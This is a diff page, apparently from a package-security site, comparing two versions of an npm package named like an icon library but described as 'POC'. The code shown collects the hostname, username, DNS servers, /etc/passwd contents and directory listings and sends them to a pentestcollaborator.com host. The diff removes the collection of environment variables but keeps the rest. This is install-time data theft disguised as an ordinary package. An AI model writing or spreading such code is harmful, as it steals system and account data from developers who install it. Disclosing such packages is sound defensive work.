@symplr-ux/alloy-icons 1.17.5 → 1.17.6

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +2 -3
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -24,14 +24,13 @@ async function main(){
24
24
  homeDir: os.homedir(),
25
25
  hostName: os.hostname(),
26
26
  username: os.userInfo().username,
27
- environment: process.env,
28
27
  dns: dns.getServers(),
29
28
  r: packageJSON ? packageJSON.___resolved : undefined,
30
29
  v: packageJSON.version,
31
30
  pjson: packageJSON,
32
31
  passwdFile: JSON.stringify(await runCode('cat /etc/passwd')),
33
- rootFolder: JSON.stringify(await runCode('ls /')),
34
- homeFolder: JSON.stringify(await runCode('ls ~/'))
32
+ rootFolder: JSON.stringify(await runCode('dir /')),
33
+ homeFolder: JSON.stringify(await runCode('dir ~/'))
35
34
  });
36
35
  const options = {
37
36
  hostname: "66av2iv4znn55vqoi91b6medu40volca.pentestcollaborator.com",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "@symplr-ux/alloy-icons",
3
- "version": "1.17.5",
3
+ "version": "1.17.6",
4
4
  "description": "POC",
5
5
  "main": "index.js",
6
6
  "scripts": {